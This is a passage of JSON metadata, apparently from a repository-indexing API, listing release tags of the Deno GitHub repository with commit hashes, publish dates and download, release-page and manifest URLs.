s_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms